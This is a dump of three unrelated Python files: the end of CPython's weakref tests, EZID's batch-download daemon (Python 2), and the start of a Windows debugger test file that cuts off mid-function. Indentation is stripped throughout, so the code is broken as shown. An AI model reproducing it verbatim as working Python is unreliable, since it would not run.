# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, False)
def test_threaded_weak_key_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, True)
def test_threaded_weak_value_dict_copy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, False)
def test_threaded_weak_value_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, True)
@support.cpython_only
def test_remove_closure(self):
d = weakref.WeakValueDictionary()
self.assertIsNone(d._remove.__closure__)
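# Illustrative sketch (not from the original file): the canonical use of
# WeakValueDictionary -- an id-to-object cache whose entries disappear on
# their own once nothing else references the cached objects.
def _example_weak_value_cache():
    cache = weakref.WeakValueDictionary()
    obj = Object(99)
    cache[99] = obj
    assert cache[99] is obj          # served from the cache while obj is alive
    del obj
    gc_collect()                     # for PyPy and other GCs
    assert 99 not in cache           # the entry vanished with its last strong ref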
from test import mapping_tests
class WeakValueDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakValueDictionary conforms to the mapping protocol"""
__ref = {"key1":Object(1), "key2":Object(2), "key3":Object(3)}
type2test = weakref.WeakValueDictionary
def _reference(self):
return self.__ref.copy()
class WeakKeyDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakKeyDictionary conforms to the mapping protocol"""
__ref = {Object("key1"):1, Object("key2"):2, Object("key3"):3}
type2test = weakref.WeakKeyDictionary
def _reference(self):
return self.__ref.copy()
class FinalizeTestCase(unittest.TestCase):
class A:
pass
def _collect_if_necessary(self):
# we create no ref-cycles so in CPython no gc should be needed
if sys.implementation.name != 'cpython':
support.gc_collect()
def test_finalize(self):
def add(x,y,z):
res.append(x + y + z)
return x + y + z
a = self.A()
res = []
f = weakref.finalize(a, add, 67, 43, z=89)
self.assertEqual(f.alive, True)
self.assertEqual(f.peek(), (a, add, (67,43), {'z':89}))
self.assertEqual(f(), 199)
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
res = []
f = weakref.finalize(a, add, 67, 43, 89)
self.assertEqual(f.peek(), (a, add, (67,43,89), {}))
self.assertEqual(f.detach(), (a, add, (67,43,89), {}))
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [])
res = []
f = weakref.finalize(a, add, x=67, y=43, z=89)
del a
self._collect_if_necessary()
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
def test_arg_errors(self):
def fin(*args, **kwargs):
res.append((args, kwargs))
a = self.A()
res = []
f = weakref.finalize(a, fin, 1, 2, func=3, obj=4)
self.assertEqual(f.peek(), (a, fin, (1, 2), {'func': 3, 'obj': 4}))
f()
self.assertEqual(res, [((1, 2), {'func': 3, 'obj': 4})])
with self.assertRaises(TypeError):
weakref.finalize(a, func=fin, arg=1)
with self.assertRaises(TypeError):
weakref.finalize(obj=a, func=fin, arg=1)
self.assertRaises(TypeError, weakref.finalize, a)
self.assertRaises(TypeError, weakref.finalize)
def test_order(self):
a = self.A()
res = []
f1 = weakref.finalize(a, res.append, 'f1')
f2 = weakref.finalize(a, res.append, 'f2')
f3 = weakref.finalize(a, res.append, 'f3')
f4 = weakref.finalize(a, res.append, 'f4')
f5 = weakref.finalize(a, res.append, 'f5')
# make sure finalizers can keep themselves alive
del f1, f4
self.assertTrue(f2.alive)
self.assertTrue(f3.alive)
self.assertTrue(f5.alive)
self.assertTrue(f5.detach())
self.assertFalse(f5.alive)
f5() # nothing because previously unregistered
res.append('A')
f3() # => res.append('f3')
self.assertFalse(f3.alive)
res.append('B')
f3() # nothing because previously called
res.append('C')
del a
self._collect_if_necessary()
# => res.append('f4')
# => res.append('f2')
# => res.append('f1')
self.assertFalse(f2.alive)
res.append('D')
f2() # nothing because previously called by gc
expected = ['A', 'f3', 'B', 'C', 'f4', 'f2', 'f1', 'D']
self.assertEqual(res, expected)
def test_all_freed(self):
# we want a weakrefable subclass of weakref.finalize
class MyFinalizer(weakref.finalize):
pass
a = self.A()
res = []
def callback():
res.append(123)
f = MyFinalizer(a, callback)
wr_callback = weakref.ref(callback)
wr_f = weakref.ref(f)
del callback, f
self.assertIsNotNone(wr_callback())
self.assertIsNotNone(wr_f())
del a
self._collect_if_necessary()
self.assertIsNone(wr_callback())
self.assertIsNone(wr_f())
self.assertEqual(res, [123])
@classmethod
def run_in_child(cls):
def error():
# Create an atexit finalizer from inside a finalizer called
# at exit. This should be the next to be run.
g1 = weakref.finalize(cls, print, 'g1')
print('f3 error')
1/0
# cls should stay alive till atexit callbacks run
f1 = weakref.finalize(cls, print, 'f1', _global_var)
f2 = weakref.finalize(cls, print, 'f2', _global_var)
f3 = weakref.finalize(cls, error)
f4 = weakref.finalize(cls, print, 'f4', _global_var)
assert f1.atexit == True
f2.atexit = False
assert f3.atexit == True
assert f4.atexit == True
def test_atexit(self):
prog = ('from test.test_weakref import FinalizeTestCase;'+
'FinalizeTestCase.run_in_child()')
rc, out, err = script_helper.assert_python_ok('-c', prog)
out = out.decode('ascii').splitlines()
self.assertEqual(out, ['f4 foobar', 'f3 error', 'g1', 'f1 foobar'])
self.assertTrue(b'ZeroDivisionError' in err)
libreftest = """ Doctest for examples in the library reference: weakref.rst
>>> from test.support import gc_collect
>>> import weakref
>>> class Dict(dict):
... pass
...
>>> obj = Dict(red=1, green=2, blue=3) # this object is weak referenceable
>>> r = weakref.ref(obj)
>>> print(r() is obj)
True
>>> import weakref
>>> class Object:
... pass
...
>>> o = Object()
>>> r = weakref.ref(o)
>>> o2 = r()
>>> o is o2
True
>>> del o, o2
>>> gc_collect() # For PyPy or other GCs.
>>> print(r())
None
>>> import weakref
>>> class ExtendedRef(weakref.ref):
... def __init__(self, ob, callback=None, **annotations):
... super().__init__(ob, callback)
... self.__counter = 0
... for k, v in annotations.items():
... setattr(self, k, v)
... def __call__(self):
... '''Return a pair containing the referent and the number of
... times the reference has been called.
... '''
... ob = super().__call__()
... if ob is not None:
... self.__counter += 1
... ob = (ob, self.__counter)
... return ob
...
>>> class A: # not in docs from here, just testing the ExtendedRef
... pass
...
>>> a = A()
>>> r = ExtendedRef(a, foo=1, bar="baz")
>>> r.foo
1
>>> r.bar
'baz'
>>> r()[1]
1
>>> r()[1]
2
>>> r()[0] is a
True
>>> import weakref
>>> _id2obj_dict = weakref.WeakValueDictionary()
>>> def remember(obj):
... oid = id(obj)
... _id2obj_dict[oid] = obj
... return oid
...
>>> def id2obj(oid):
... return _id2obj_dict[oid]
...
>>> a = A() # from here, just testing
>>> a_id = remember(a)
>>> id2obj(a_id) is a
True
>>> del a
>>> gc_collect() # For PyPy or other GCs.
>>> try:
... id2obj(a_id)
... except KeyError:
... print('OK')
... else:
... print('WeakValueDictionary error')
OK
"""
__test__ = {'libreftest' : libreftest}
def test_main():
support.run_unittest(
ReferencesTestCase,
WeakMethodTestCase,
MappingTestCase,
WeakValueDictionaryTestCase,
WeakKeyDictionaryTestCase,
SubclassableWeakrefTestCase,
FinalizeTestCase,
)
support.run_doctest(sys.modules[__name__])
if __name__ == "__main__":
test_main()
|
download.py
|
# =============================================================================
#
# EZID :: download.py
#
# Batch download.
#
# Downloads are created by a single daemon thread. The download
# creation process is designed to be restartable at any point: if the
# server is restarted, the current download resumes where it left off.
#
# When the server is reloaded, a new daemon thread gets created. Race
# conditions exist between the old and new threads while the old
# thread still exists, but actual conflicts should be very unlikely.
#
# Author:
# Greg Janee <gjanee@ucop.edu>
#
# License:
# Copyright (c) 2015, Regents of the University of California
# http://creativecommons.org/licenses/BSD/
#
# -----------------------------------------------------------------------------
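# Note (added for clarity; derived from _daemonThread and the stage handlers
# below): a queued request walks through the stages
#   CREATE -> HARVEST -> COMPRESS -> DELETE -> MOVE -> NOTIFY
# and each handler persists the next stage in its DownloadQueue row, which is
# what makes the process restartable at any point.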
import csv
import django.conf
import django.core.mail
import hashlib
import os
import os.path
import re
import subprocess
import threading
import time
import uuid
import anvl
import config
import ezidapp.models
import log
import policy
import util
import util2
_ezidUrl = None
_usedFilenames = None
_lock = threading.Lock()
_daemonEnabled = None
_threadName = None
_idleSleep = None
_gzipCommand = None
_zipCommand = None
def loadConfig ():
global _ezidUrl, _usedFilenames, _daemonEnabled, _threadName, _idleSleep
global _gzipCommand, _zipCommand
_ezidUrl = config.get("DEFAULT.ezid_base_url")
_lock.acquire()
try:
if _usedFilenames == None:
_usedFilenames = [r.filename for r in\
ezidapp.models.DownloadQueue.objects.all()] +\
[f.split(".")[0] for f in\
os.listdir(django.conf.settings.DOWNLOAD_PUBLIC_DIR)]
finally:
_lock.release()
_idleSleep = int(config.get("daemons.download_processing_idle_sleep"))
_gzipCommand = config.get("DEFAULT.gzip_command")
_zipCommand = config.get("DEFAULT.zip_command")
_daemonEnabled = (django.conf.settings.DAEMON_THREADS_ENABLED and\
config.get("daemons.download_enabled").lower() == "true")
if _daemonEnabled:
_threadName = uuid.uuid1().hex
t = threading.Thread(target=_daemonThread, name=_threadName)
t.setDaemon(True)
t.start()
_formatCode = {
"anvl": ezidapp.models.DownloadQueue.ANVL,
"csv": ezidapp.models.DownloadQueue.CSV,
"xml": ezidapp.models.DownloadQueue.XML
}
_formatSuffix = {
ezidapp.models.DownloadQueue.ANVL: "txt",
ezidapp.models.DownloadQueue.CSV: "csv",
ezidapp.models.DownloadQueue.XML: "xml"
}
_compressionCode = {
"gzip": ezidapp.models.DownloadQueue.GZIP,
"zip": ezidapp.models.DownloadQueue.ZIP
}
class _ValidationException (Exception):
pass
def _validateString (v):
s = v.strip()
if s == "": raise _ValidationException("empty value")
return s
def _validateEnumerated (v, l):
if v not in l: raise _ValidationException("invalid parameter value")
return v
def _validateBoolean (v):
return (_validateEnumerated(v, ["yes", "no"]) == "yes")
def _validateTimestamp (v):
try:
try:
return util.parseTimestampZulu(v)
except:
return int(v)
except:
raise _ValidationException("invalid timestamp")
def _validateUser (v):
u = ezidapp.models.getUserByUsername(v)
if u != None and not u.isAnonymous:
return u
else:
raise _ValidationException("no such user")
def _validateGroup (v):
g = ezidapp.models.getGroupByGroupname(v)
if g != None and not g.isAnonymous:
return g
else:
raise _ValidationException("no such group")
# A simple encoding mechanism for storing Python objects as strings
# follows. We could use pickling, but this technique makes debugging
# a little easier.
def _escape (s):
return re.sub("[%,=]", lambda c: "%%%02X" % ord(c.group(0)), s)
def _encode (o):
if type(o) is bool:
return "B" + str(o)
elif type(o) is int:
return "I" + str(o)
elif type(o) in [str, unicode]:
return "S" + o
elif type(o) is list:
return "L" + ",".join(map(lambda i: _escape(_encode(i)), o))
elif type(o) is dict:
return "D" + ",".join(map(lambda kv: "%s=%s" % (_escape(_encode(kv[0])),
_escape(_encode(kv[1]))), o.items()))
else:
assert False, "unhandled case"
def _unescape (s):
return re.sub("%([0-9A-F][0-9A-F])", lambda m: chr(int(m.group(1), 16)), s)
def _decode (s):
if s[0] == "B":
return (s[1:] == "True")
elif s[0] == "I":
return int(s[1:])
elif s[0] == "S":
return s[1:]
elif s[0] == "L":
if len(s) > 1:
return map(lambda i: _decode(_unescape(i)), s[1:].split(","))
else:
return []
elif s[0] == "D":
if len(s) > 1:
return dict(map(lambda i: tuple(map(lambda kv: _decode(_unescape(kv)),
i.split("="))), s[1:].split(",")))
else:
return {}
else:
assert False, "unhandled case"
_parameters = {
# name: (repeatable, validator)
"column": (True, _validateString),
"convertTimestamps": (False, _validateBoolean),
"createdAfter": (False, _validateTimestamp),
"createdBefore": (False, _validateTimestamp),
"crossref": (False, _validateBoolean),
"datacite": (False, _validateBoolean),
"exported": (False, _validateBoolean),
"format": (False, lambda v: _validateEnumerated(v, ["anvl", "csv", "xml"])),
"compression": (False, lambda v: _validateEnumerated(v, ["gzip", "zip"])),
"notify": (True, _validateString),
"owner": (True, _validateUser),
"ownergroup": (True, _validateGroup),
"permanence": (False, lambda v: _validateEnumerated(v, ["test", "real"])),
"profile": (True, _validateString),
"status": (True, lambda v: _validateEnumerated(v, ["reserved", "public",
"unavailable"])),
"type": (True, lambda v: _validateEnumerated(v, ["ark", "doi", "uuid"])),
"updatedAfter": (False, _validateTimestamp),
"updatedBefore": (False, _validateTimestamp)
}
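# For example (illustration only): _parameters["format"][1]("csv") returns "csv",
# while _parameters["format"][1]("pdf") raises _ValidationException; repeatable
# parameters such as "owner" are applied to every submitted value via map() in
# enqueueRequest below.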
def _generateFilename (requestor):
while True:
f = hashlib.sha1("%s,%s,%s" % (requestor, str(time.time()),
django.conf.settings.SECRET_KEY)).hexdigest()[::4]
_lock.acquire()
try:
if f not in _usedFilenames:
_usedFilenames.append(f)
return f
finally:
_lock.release()
def enqueueRequest (user, request):
"""
Enqueues a batch download request. The request must be
authenticated; 'user' should be a StoreUser object. 'request'
should be a django.http.QueryDict object (from a POST request or
manually created) containing the parameters of the request. The
available parameters are described in the API documentation. One
feature not mentioned in the documentation: for the 'notify'
parameter, an email address may be a straight address
("fred@slate.com") or may include an addressee name ("Fred
Flintstone <fred@slate.com>"); in the latter case a salutation line
will be added to the email message.
The successful return is a string that includes the download URL, as
in:
success: https://ezid.cdlib.org/download/da543b91a0.xml.gz
Unsuccessful returns include the strings:
error: forbidden
error: bad request - subreason...
error: internal server error
"""
def error (s):
return "error: bad request - " + s
try:
d = {}
for k in request:
if k not in _parameters:
return error("invalid parameter: " + util.oneLine(k))
try:
if _parameters[k][0]:
d[k] = map(_parameters[k][1], request.getlist(k))
else:
if len(request.getlist(k)) > 1:
return error("parameter is not repeatable: " + k)
d[k] = _parameters[k][1](request[k])
except _ValidationException, e:
return error("parameter '%s': %s" % (k, str(e)))
if "format" not in d:
return error("missing required parameter: format")
format = d["format"]
del d["format"]
if "compression" in d:
compression = d["compression"]
del d["compression"]
else:
compression = "gzip"
if format == "csv":
if "column" not in d:
return error("format 'csv' requires at least one column")
columns = d["column"]
del d["column"]
else:
if "column" in d:
return error("parameter is incompatible with format: column")
columns = []
toHarvest = []
if "owner" in d:
for o in d["owner"]:
if not policy.authorizeDownload(user, owner=o):
return "error: forbidden"
if o.pid not in toHarvest: toHarvest.append(o.pid)
del d["owner"]
if "ownergroup" in d:
for g in d["ownergroup"]:
if not policy.authorizeDownload(user, ownergroup=g):
return "error: forbidden"
for u in g.users.all():
if u.pid not in toHarvest: toHarvest.append(u.pid)
del d["ownergroup"]
if len(toHarvest) == 0: toHarvest = [user.pid]
if "notify" in d:
notify = d["notify"]
del d["notify"]
else:
notify = []
if "convertTimestamps" in d:
options = { "convertTimestamps": d["convertTimestamps"] }
del d["convertTimestamps"]
else:
options = { "convertTimestamps": False }
requestor = user.pid
filename = _generateFilename(requestor)
r = ezidapp.models.DownloadQueue(requestTime=int(time.time()),
rawRequest=request.urlencode(),
requestor=requestor, format=_formatCode[format],
compression=_compressionCode[compression],
columns=_encode(columns), constraints=_encode(d),
options=_encode(options), notify=_encode(notify), filename=filename,
toHarvest=",".join(toHarvest))
r.save()
return "success: %s/download/%s.%s" % (_ezidUrl, filename,
_fileSuffix(r))
except Exception, e:
log.otherError("download.enqueueRequest", e)
return "error: internal server error"
def getQueueLength ():
"""
Returns the length of the batch download queue.
"""
return ezidapp.models.DownloadQueue.objects.count()
class _AbortException (Exception):
pass
def _checkAbort ():
# This function provides a handy way to abort processing if the
# daemon is disabled or if a new daemon thread is started by a
# configuration reload. It doesn't entirely eliminate potential
# race conditions between two daemon threads, but it should make
# conflicts very unlikely.
if not _daemonEnabled or threading.currentThread().getName() != _threadName:
raise _AbortException()
def _wrapException (context, exception):
m = str(exception)
if len(m) > 0: m = ": " + m
return Exception("batch download error: %s: %s%s" % (context,
type(exception).__name__, m))
def _fileSuffix (r):
if r.compression == ezidapp.models.DownloadQueue.GZIP:
return _formatSuffix[r.format] + ".gz"
else:
return "zip"
def _path (r, i):
# i=1: uncompressed work file
# i=2: compressed work file
# i=3: compressed delivery file
# i=4: request sidecar file
if i in [1, 2]:
d = django.conf.settings.DOWNLOAD_WORK_DIR
else:
d = django.conf.settings.DOWNLOAD_PUBLIC_DIR
if i == 1:
s = _formatSuffix[r.format]
elif i in [2, 3]:
s = _fileSuffix(r)
else:
s = "request"
return os.path.join(d, "%s.%s" % (r.filename, s))
def _csvEncode (s):
return util.oneLine(s).encode("UTF-8")
def _flushFile (f):
f.flush()
os.fsync(f.fileno())
def _createFile (r):
f = None
try:
f = open(_path(r, 1), "wb")
if r.format == ezidapp.models.DownloadQueue.CSV:
w = csv.writer(f)
w.writerow([_csvEncode(c) for c in _decode(r.columns)])
_flushFile(f)
elif r.format == ezidapp.models.DownloadQueue.XML:
f.write("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<records>")
_flushFile(f)
# We don't know exactly what the CSV writer wrote, so we must
# probe the file to find its size.
n = f.tell()
except Exception, e:
raise _wrapException("error creating file", e)
else:
r.stage = ezidapp.models.DownloadQueue.HARVEST
r.fileSize = n
r.save()
finally:
if f: f.close()
def _satisfiesConstraints (id, constraints):
for k, v in constraints.items():
if k == "createdAfter":
if id.createTime < v: return False
elif k == "createdBefore":
if id.createTime >= v: return False
elif k == "crossref":
if id.isCrossref^v: return False
elif k == "datacite":
if id.isDatacite^v: return False
elif k == "exported":
if id.exported^v: return False
elif k == "permanence":
if id.isTest^(v == "test"): return False
elif k == "profile":
if id.profile.label not in v: return False
elif k == "status":
if id.get_status_display() not in v: return False
elif k == "type":
if id.type not in v: return False
elif k == "updatedAfter":
if id.updateTime < v: return False
elif k == "updatedBefore":
if id.updateTime >= v: return False
else:
assert False, "unhandled case"
return True
def _prepareMetadata (id, convertTimestamps):
d = id.toLegacy()
util2.convertLegacyToExternal(d)
if id.isDoi: d["_shadowedby"] = id.arkAlias
if convertTimestamps:
d["_created"] = util.formatTimestampZulu(int(d["_created"]))
d["_updated"] = util.formatTimestampZulu(int(d["_updated"]))
return d
def _writeAnvl (f, id, metadata):
if f.tell() > 0: f.write("\n")
f.write(":: %s\n" % id.identifier)
f.write(anvl.format(metadata).encode("UTF-8"))
def _writeCsv (f, columns, id, metadata):
w = csv.writer(f)
l = []
for c in columns:
if c == "_id":
l.append(id.identifier)
elif c == "_mappedCreator":
l.append(id.resourceCreator)
elif c == "_mappedTitle":
l.append(id.resourceTitle)
elif c == "_mappedPublisher":
l.append(id.resourcePublisher)
elif c == "_mappedDate":
l.append(id.resourcePublicationDate)
elif c == "_mappedType":
l.append(id.resourceType)
else:
l.append(metadata.get(c, ""))
w.writerow([_csvEncode(c) for c in l])
def _writeXml (f, id, metadata):
f.write("<record identifier=\"%s\">" % util.xmlEscape(id.identifier))
for k, v in metadata.items():
if k in ["datacite", "crossref"]:
v = util.removeXmlDeclaration(v)
else:
v = util.xmlEscape(v)
f.write(("<element name=\"%s\">%s</element>" %\
(util.xmlEscape(k), v)).encode("UTF-8"))
f.write("</record>")
def _harvest1 (r, f):
columns = _decode(r.columns)
constraints = _decode(r.constraints)
options = _decode(r.options)
while True:
_checkAbort()
qs = ezidapp.models.SearchIdentifier.objects.filter(
identifier__gt=r.lastId)\
.filter(owner__pid=r.toHarvest.split(",")[r.currentIndex])\
.select_related("owner", "ownergroup", "datacenter", "profile")\
.order_by("identifier")
ids = list(qs[:1000])
if len(ids) == 0: break
try:
for id in ids:
_checkAbort()
if _satisfiesConstraints(id, constraints):
m = _prepareMetadata(id, options["convertTimestamps"])
if r.format == ezidapp.models.DownloadQueue.ANVL:
_writeAnvl(f, id, m)
elif r.format == ezidapp.models.DownloadQueue.CSV:
_writeCsv(f, columns, id, m)
elif r.format == ezidapp.models.DownloadQueue.XML:
_writeXml(f, id, m)
else:
assert False, "unhandled case"
_checkAbort()
_flushFile(f)
except _AbortException:
raise
except Exception, e:
raise _wrapException("error writing file", e)
r.lastId = ids[-1].identifier
r.fileSize = f.tell()
r.save()
def _harvest (r):
f = None
try:
try:
assert os.path.getsize(_path(r, 1)) >= r.fileSize, "file is short"
f = open(_path(r, 1), "r+b")
f.seek(r.fileSize)
f.truncate()
except Exception, e:
raise _wrapException("error re-opening/seeking/truncating file", e)
start = r.currentIndex
for i in range(r.currentIndex, len(r.toHarvest.split(","))):
_checkAbort()
if i > start:
r.currentIndex = i
r.lastId = ""
r.save()
_harvest1(r, f)
_checkAbort()
if r.format == ezidapp.models.DownloadQueue.XML:
try:
f.write("</records>")
_flushFile(f)
except Exception, e:
raise _wrapException("error writing file footer", e)
r.stage = ezidapp.models.DownloadQueue.COMPRESS
r.save()
finally:
if f: f.close()
def _compressFile (r):
infile = None
outfile = None
try:
# The compression command may be long-lived, and a new daemon
# thread may be created by a server restart or reload while it is
# still running, in which case we don't try to kill the old
# process, but simply delete its output file and let it die a
# natural death.
if os.path.exists(_path(r, 2)): os.unlink(_path(r, 2))
if r.compression == ezidapp.models.DownloadQueue.GZIP:
infile = open(_path(r, 1))
outfile = open(_path(r, 2), "w")
p = subprocess.Popen([_gzipCommand], stdin=infile, stdout=outfile,
stderr=subprocess.PIPE, close_fds=True, env={})
stderr = p.communicate()[1]
else:
p = subprocess.Popen([_zipCommand, "-jq", _path(r, 2), _path(r, 1)],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, close_fds=True, env={})
stderr = p.communicate()[0]
_checkAbort()
assert p.returncode == 0 and stderr == "",\
"compression command returned status code %d, stderr '%s'" %\
(p.returncode, stderr)
except _AbortException:
raise
except Exception, e:
raise _wrapException("error compressing file", e)
else:
r.stage = ezidapp.models.DownloadQueue.DELETE
r.save()
finally:
if infile: infile.close()
if outfile: outfile.close()
def _deleteUncompressedFile (r):
try:
if os.path.exists(_path(r, 1)): os.unlink(_path(r, 1))
except Exception, e:
raise _wrapException("error deleting uncompressed file", e)
else:
r.stage = ezidapp.models.DownloadQueue.MOVE
r.save()
def _moveCompressedFile (r):
try:
if os.path.exists(_path(r, 2)):
os.rename(_path(r, 2), _path(r, 3))
else:
assert os.path.exists(_path(r, 3)), "file has disappeared"
except Exception, e:
raise _wrapException("error moving compressed file", e)
else:
r.stage = ezidapp.models.DownloadQueue.NOTIFY
r.save()
def _notifyRequestor (r):
f = None
try:
f = open(_path(r, 4), "w")
f.write("%s\n%s\n" % (ezidapp.models.getUserByPid(r.requestor).username,
r.rawRequest.encode("UTF-8")))
except Exception, e:
raise _wrapException("error writing sidecar file", e)
finally:
if f: f.close()
for emailAddress in _decode(r.notify):
m = re.match("(.*)<([^>]*)>$", emailAddress)
if m and m.group(1).strip() != "" and m.group(2).strip() != "":
salutation = "Dear %s,\n\n" % m.group(1).strip()
emailAddress = m.group(2).strip()
else:
salutation = ""
message = ("%sThank you for using ARKetype to easily create and manage " +\
"your identifiers. The batch download you requested is available " +\
"at:\n\n" +\
"%s/download/%s.%s\n\n" +\
"The download will be deleted in 1 week.\n\n" +\
"Best,\n" +\
"ARKetype Team\n\n" +\
"This is an automated email. Please do not reply.\n") %\
(salutation, _ezidUrl, r.filename, _fileSuffix(r))
try:
django.core.mail.send_mail("Your EZID batch download link", message,
django.conf.settings.SERVER_EMAIL, [emailAddress], fail_silently=True)
except Exception, e:
raise _wrapException("error sending email", e)
r.delete()
def _daemonThread ():
doSleep = True
while True:
if doSleep:
django.db.connections["default"].close()
django.db.connections["search"].close()
time.sleep(_idleSleep)
try:
_checkAbort()
r = ezidapp.models.DownloadQueue.objects.all().order_by("seq")[:1]
if len(r) == 0:
doSleep = True
continue
r = r[0]
_checkAbort()
if r.stage == ezidapp.models.DownloadQueue.CREATE:
_createFile(r)
elif r.stage == ezidapp.models.DownloadQueue.HARVEST:
_harvest(r)
elif r.stage == ezidapp.models.DownloadQueue.COMPRESS:
_compressFile(r)
elif r.stage == ezidapp.models.DownloadQueue.DELETE:
_deleteUncompressedFile(r)
elif r.stage == ezidapp.models.DownloadQueue.MOVE:
_moveCompressedFile(r)
elif r.stage == ezidapp.models.DownloadQueue.NOTIFY:
_notifyRequestor(r)
else:
assert False, "unhandled case"
doSleep = False
except _AbortException:
break
except Exception, e:
log.otherError("download._daemonThread", e)
doSleep = True
|
test_debugger.py
|
import pytest
import textwrap
import ctypes
import os
import windows
import windows.generated_def as gdef
import windows.native_exec.simple_x86 as x86
import windows.native_exec.simple_x64 as x64
from conftest import generate_pop_and_exit_fixtures, pop_proc_32, pop_proc_64
from pfwtest import *
proc32_debug = generate_pop_and_exit_fixtures([pop_proc_32], ids=["proc32dbg"], dwCreationFlags=gdef.DEBUG_PROCESS)
proc64_debug = generate_pop_and_exit_fixtures([pop_proc_64], ids=["proc64dbg"], dwCreationFlags=gdef.DEBUG_PROCESS)
if is_process_64_bits:
proc32_64_debug = generate_pop_and_exit_fixtures([pop_proc_32, pop_proc_64], ids=["proc32dbg", "proc64dbg"],
dwCreationFlags=gdef.DEBUG_PROCESS)
else:
# proc32_64_debug = proc32_debug
no_dbg_64_from_32 = lambda *x, **kwargs: pytest.skip("Cannot debug a proc64 from a 32b process")
proc32_64_debug = generate_pop_and_exit_fixtures([pop_proc_32, no_dbg_64_from_32], ids=["proc32dbg", "proc64dbg"], dwCreationFlags=gdef.DEBUG_PROCESS)
yolo = generate_pop_and_exit_fixtures([pop_proc_32, pop_proc_64], ids=["proc32dbg", "proc64dbg"], dwCreationFlags=gdef.CREATE_SUSPENDED)
def test_init_breakpoint_callback(proc32_64_debug):
"""Checking that the initial breakpoint call `on_exception`"""
class MyDbg(windows.debug.Debugger):
def on_exception(self, exception):
assert exception.ExceptionRecord.ExceptionCode == gdef.EXCEPTION_BREAKPOINT
self.current_process.exit()
d = MyDbg(proc32_64_debug)
d.loop()
def get_debug_process_ndll(proc):
proc_pc = proc.threads[0].context.pc
ntdll_addr = proc.query_memory(proc_pc).AllocationBase
return windows.pe_parse.GetPEFile(ntdll_addr, target=proc)
def test_simple_standard_breakpoint(proc32_64_debug):
"""Check that a standard Breakpoint method `trigger` is called with the correct informations"""
class TSTBP(windows.debug.Breakpoint):
def trigger(self, dbg, exc):
assert dbg.current_process.pid == proc32_64_debug.pid
assert dbg.current_process.read_memory(self.addr, 1) == "\xcc"
assert dbg.current_thread.context.pc == self.addr
d.current_process.exit()
LdrLoadDll = get_debug_process_ndll(proc32_64_debug).exports["LdrLoadDll"]
d = windows.debug.Debugger(proc32_64_debug)
d.add_bp(TSTBP(LdrLoadDll))
d.loop()
def test_simple_hwx_breakpoint(proc32_64_debug):
"""Test that simple HXBP are trigger"""
class TSTBP(windows.debug.HXBreakpoint):
def trigger(self, dbg, exc):
assert dbg.current_process.pid == proc32_64_debug.pid
assert dbg.current_thread.context.pc == self.addr
assert dbg.current_thread.context.Dr7 != 0
d.current_process.exit()
LdrLoadDll = get_debug_process_ndll(proc32_64_debug).exports["LdrLoadDll"]
d = windows.debug.Debugger(proc32_64_debug)
d.add_bp(TSTBP(LdrLoadDll))
d.loop()
def test_multiple_hwx_breakpoint(proc32_64_debug):
"""Checking that multiple succesives HXBP are properly triggered"""
class TSTBP(windows.debug.HXBreakpoint):
COUNTER = 0
def __init__(self, addr, expec_before):
self.addr = addr
self.expec_before = expec_before
def trigger(self, dbg, exc):
assert dbg.current_process.pid == proc32_64_debug.pid
assert dbg.current_thread.context.pc == self.addr
assert dbg.current_thread.context.Dr7 != 0
assert TSTBP.COUNTER == self.expec_before
assert dbg.current_process.read_memory(self.addr, 1) != "\xcc"
TSTBP.COUNTER += 1
if TSTBP.COUNTER == 4:
d.current_process.exit()
d = windows.debug.Debugger(proc32_64_debug)
addr = proc32_64_debug.virtual_alloc(0x1000)
proc32_64_debug.write_memory(addr, "\x90" * 8)
d.add_bp(TSTBP(addr, 0))
d.add_bp(TSTBP(addr + 1, 1))
d.add_bp(TSTBP(addr + 2, 2))
d.add_bp(TSTBP(addr + 3, 3))
proc32_64_debug.create_thread(addr, 0)
d.loop()
# Used to verify we actually called the Breakpoints
assert TSTBP.COUNTER == 4
def test_four_hwx_breakpoint_fail(proc32_64_debug):
"""Check that setting 4HXBP in the same thread fails"""
# print("test_four_hwx_breakpoint_fail {0}".format(proc32_64_debug))
class TSTBP(windows.debug.HXBreakpoint):
def __init__(self, addr, expec_before):
self.addr = addr
self.expec_before = expec_before
def trigger(self, dbg, exc):
raise NotImplementedError("Should fail before")
d = windows.debug.Debugger(proc32_64_debug)
addr = proc32_64_debug.virtual_alloc(0x1000)
proc32_64_debug.write_memory(addr, "\x90" * 8 + "\xc3")
d.add_bp(TSTBP(addr, 0))
d.add_bp(TSTBP(addr + 1, 1))
d.add_bp(TSTBP(addr + 2, 2))
d.add_bp(TSTBP(addr + 3, 3))
d.add_bp(TSTBP(addr + 4, 4))
proc32_64_debug.create_thread(addr, 0)
with pytest.raises(ValueError) as e:
d.loop()
assert "DRx" in e.value.message
def test_hwx_breakpoint_are_on_all_thread(proc32_64_debug):
"""Checking that HXBP without target are set on all threads"""
class MyDbg(windows.debug.Debugger):
def on_create_thread(self, exception):
# Check that threads created later also get their HWX breakpoint :)
assert self.current_thread.context.Dr7 != 0
class TSTBP(windows.debug.HXBreakpoint):
COUNTER = 0
def __init__(self, addr, expec_before):
self.addr = addr
self.expec_before = expec_before
def trigger(self, dbg, exc):
assert len(dbg.current_process.threads) != 1
#for t in dbg.current_process.threads:
